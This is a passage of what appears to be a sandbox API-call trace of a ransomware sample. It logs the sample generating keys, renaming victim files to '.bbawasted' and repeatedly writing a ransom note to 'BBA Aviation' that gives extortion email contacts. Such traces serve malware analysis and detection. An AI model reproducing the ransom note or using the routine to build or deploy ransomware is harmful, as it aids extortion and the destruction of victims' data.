lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0163.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.114] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l42oMyEZTtapt9ZF5ZnbgJFFbsN7oO6HoolMqMNbTEHkt+Ey5FuTJwSn26fYaAfp\r\nKsP9DLUm7DeQ6b+NKvWqkaFzyJD7YC63pfmcs6vQEUvJja1dt5FwW61B9/irQ/Hq\r\nH1BjvaCXF5GlPDy9lc/6du3fCdeF0R4bIwFhHP1ZbjwKUh9wgq6JVXva47tft8ur\r\ngap05qH/TFUrJg+bW6gZIgauUewo6jLMfBbQatOGyJRQxd5imwQjR9iW9JmPzd7R\r\n8uStepI/q/6GR+BH3L7N67qcdEACL+wDfvjLKqdPIyuJUQKz0pR0sJcLIIDmM7Cm\r\nOnYrGxKY/G9AKIYFcFwYXOwgMlyYj9qLkWIUzxYjjfgN+9DNSOvV/YSU+67gr+fn\r\nlhxfIEbgj/VCeP5uFzDvo6tqL9+Gosg27dt5Jc/hVwFhKQGl6dsfRd0jNYu4MV8i\r\niOsBLhyvegswvnN/KbnQiT3uDWCxjMnuVDa5ob5n/ruHdq5Sapc15BYV4c/qRLEN\r\n7kbWmbZTV0IB4PitAb0+0NxEZGgg+MKi2FOoqjYlVnBdF4yH8nOpOTwkct8bdP9c\r\nP6d203ba5wYAMvI5m+01rPsE3ZLpdxL5emu6+U9d5f376DLI1zZmTgdbOBF63pN6\r\n91S4hYsE94BdvM9GEqhx6F97Uyk3JF3q07lX3GjRMNr=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.114] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0163.114] SetEndOfFile (hFile=0x288) returned 1 [0163.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.116] CloseHandle (hObject=0x288) returned 1 [0163.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0163.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e0b0 | out: hHeap=0x660000) returned 1 [0163.121] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0163.121] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0163.121] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.121] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 52 [0163.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x69e318 [0163.122] lstrcpyW (in: lpString1=0x69e380, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.122] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66c898) returned 1 [0163.122] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.122] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.122] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0163.123] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.124] SetEndOfFile (hFile=0x288) returned 1 [0163.125] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.125] lstrcpyW (in: lpString1=0x69e380, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.bbawasted")) returned 1 [0163.126] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0163.126] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0163.126] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x16c82 [0163.126] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16c82) returned 0x630000 [0163.126] CloseHandle (hObject=0x27c) returned 1 [0163.135] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0163.136] CloseHandle (hObject=0x294) returned 1 [0163.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.136] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x66c898) returned 1 [0163.137] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.137] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.137] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x66c898) returned 1 [0163.137] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0163.137] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0163.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.292] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nGBeNGc0sVT/YHg7FccreEPfQuGsjXQ4fbFhitV8V1BjZlbdfPrgPYe2zi/b3+j4\r\ncRz19zo7VC5LkP2LUl+Cyf+kM0xSZCCOKqQ/Fza5xr8XSyRTdVOC4NX/mT0UsMPk\r\nIazDYXf9mPG/iRr3RdiFli37RDPtthYHkexZsfcQe0agA69h3Up8AZ3l8uWGqW52\r\ngEgRG401aEA5EEoUJaBYujvgLWP+/7SrmnCgCVyOIgyUSKgY0L7gVhkJXSF3ue+4\r\niHUPJMSVUqNsYGhnZ7eofHFdgtudKgt/ejxgme0gxsrx9gvNvy9dAeyfqboMIwS0\r\nCYA0J3yqJRMELw+jaQvHpBbi2pT523DXY6Pi3g5AF+z/hE2b8pvfDn3SzDGJvWpA\r\nTKpWb2Z4k5zwEgeByVJta2HLl6WWqeSZJXixQ04BdqwwX+KV5Zo7syRvKjmONgKn\r\n3cTVhdjsulBA0AIB3dD5WFoLJnMTLHAl/s5zrwokVIthkhedRzBg/wwlXdKAuu+/\r\ntJFN4WQ44aQlgtBbpOArooHzPaaCDSDILLF/Y+Fo9GkNzE1qBSv4+1c4UMAHleuZ\r\nRXEpBTiv2sPfakT5HFPkR4x8qKGLV33zib/jlqyPmtfsclhdlInFrxRYVJ6ZMPwn\r\nJRYwF3BjxrA1OEUFoDkvwpyNICwQP80bn5KPdlRADW5=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.292] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0163.292] SetEndOfFile (hFile=0x288) returned 1 [0163.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.295] CloseHandle (hObject=0x288) returned 1 [0163.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0163.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0720 | out: hHeap=0x660000) returned 1 [0163.298] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6aef58) returned 1 [0163.298] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0163.298] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.298] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 45 [0163.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x69e318 [0163.298] lstrcpyW (in: lpString1=0x69e372, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.299] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef58) returned 1 [0163.299] CryptGenRandom (in: hProv=0x6aef58, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.299] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.299] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0163.302] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.304] SetEndOfFile (hFile=0x288) returned 1 [0163.304] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.304] lstrcpyW (in: lpString1=0x69e372, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.bbawasted")) returned 1 [0163.305] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0163.305] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0163.305] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x988a [0163.305] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x988a) returned 0x640000 [0163.305] CloseHandle (hObject=0x27c) returned 1 [0163.311] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.311] CloseHandle (hObject=0x294) returned 1 [0163.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.311] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef58) returned 1 [0163.312] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.312] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.312] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef58) returned 1 [0163.313] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0163.313] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0163.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.324] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kRbtJ2XzxvgFaTJAxvY+zc/Jn9WPHxz+Y9vtK229JGJBE+l0zst4TZHD3VD+vPP1\r\n1QjNVMRoI1fBbAWPjJSITPiovQpasPVqynXEzwbaGw7/ejDpVX+RuaozQKKU0g8e\r\nt9zvopC7qR0Dt/DESqDZulncxMORLTcAeF3TxU2EQnL1wtWESpHF33f1J24o7tK6\r\n106fqt8yrTN3Xv2BuKBQCviw+3T9R6qq4SONxRA9hoKu+fu1WpA0k0aT2jBEgsmG\r\nkk42HC5B4Xw927ynV4TNCQN2PUVGHU6D7aZpQg9sZra96NtrabqPiNYp4R3M7UHj\r\naIgu6YgrWmOArHRwQcNLBxhOfoKFH5C2CQRK8bMdGMOB4EiPCxhpryH1PWhgAeoK\r\nmRgsILwMjBJjhcNHoDyRnQbykWj56JVp3xnf5UWjO6NMO5rKolz9SiecdHSf5mWR\r\nkoDXJAdUG3z41N5X9aN1P/1et38DoxtcY7VNEzAEZfuOFLp1USChQz547fRhFcz0\r\niYeQ+3Glwxbd7oQlN585iW6KPxZnY48JwCf1Is+18XrH8/N5sfxj7oSCjW1+pAxA\r\naQuCjZP6RlbXdlir/tpka0yrp16PYzOUw8gaXvYu1ITWLCXCXmUE8aJDaLIDvwMk\r\nppBIsSu0HrxKt4/llDPc18VCB9KKkMi4s7dzBWTOgpD=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.324] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0163.324] SetEndOfFile (hFile=0x288) returned 1 [0163.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.327] CloseHandle (hObject=0x288) returned 1 [0163.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0163.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a07e8 | out: hHeap=0x660000) returned 1 [0163.448] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66d1d0) returned 1 [0163.448] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0163.449] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0163.449] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 46 [0163.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x69e318 [0163.449] lstrcpyW (in: lpString1=0x69e374, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0163.449] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66d1d0) returned 1 [0163.449] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0163.449] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0163.450] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0163.450] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.451] SetEndOfFile (hFile=0x288) returned 1 [0163.452] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0163.452] lstrcpyW (in: lpString1=0x69e374, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.bbawasted")) returned 1 [0163.453] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0163.453] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0163.453] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x37e [0163.453] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0163.453] CloseHandle (hObject=0x280) returned 1 [0163.458] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.458] CloseHandle (hObject=0x27c) returned 1 [0163.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.459] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x66c898) returned 1 [0163.459] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.459] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.459] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x66c898) returned 1 [0163.460] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0163.460] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0163.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.471] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EtjuBzqpUOyCjyfzXWOkhHkxMs4NBPJpLqcskshLnxYLgQDmqbH9m3A+OuQ321+0\r\nhULK0gPwT+DOl26THNCuI/bcBDQ4UE0Jrxrm0MSWxvzMoe/O6zn3CmWMrv56Ih+x\r\n0GHqS8Oxcs6GsZIf6f1P3ggEbz4h/W3ltX7dRjBuwVga5Bcz2t6QwwlaMKVdUd5W\r\nNG3JoFS1XP6mU/IPNH2pSMTWU2BXy8PnhY+DxOikIxzkdsfpkVRYRbS+bv7i19H6\r\n9FabCxBO8wTknOXZ6T25XQ1knMxLi7GHx14tLkSjYQvlWtg6gPzYFxa62impRQlD\r\nSBDAkWhoEZNdEipsQoavPM3FXNF7YYfY8p78Hy1ETUUwIlLiE2m8tsOjtfkm5gOI\r\n+u/uN5P5evP/KFC7UEuo+i2oLopnIs9asF5Q0rPFHhQYkF2MeO2GUUig5VZNNPOe\r\nn3XYv6VCPL1DTXBR3/Yk9R8HfNAFGE21X5pBrLF5jXAs+8UkPSS+tMRiIPHsPEQR\r\ny7yuAx/TV0vNI8DKG6gMaaDWigWEvTO2TT1WQU0YA6pIBfqGoPDaycVqIAGIR1hW\r\nprCnHvh9E4UYI1R/5qc23ffEfZ3yx0yUHXusFamMEJ42t2980UOedhp6HJtDUfyQ\r\nRkdm/ryJxSQ0HlMCe7lYGLJxj5StnvuFmyIlBpsxZrA=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.471] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0163.471] SetEndOfFile (hFile=0x288) returned 1 [0163.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.474] CloseHandle (hObject=0x288) returned 1 [0163.480] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0163.480] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a37e0 | out: hHeap=0x660000) returned 1 [0163.480] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0163.481] CryptGenRandom (in: 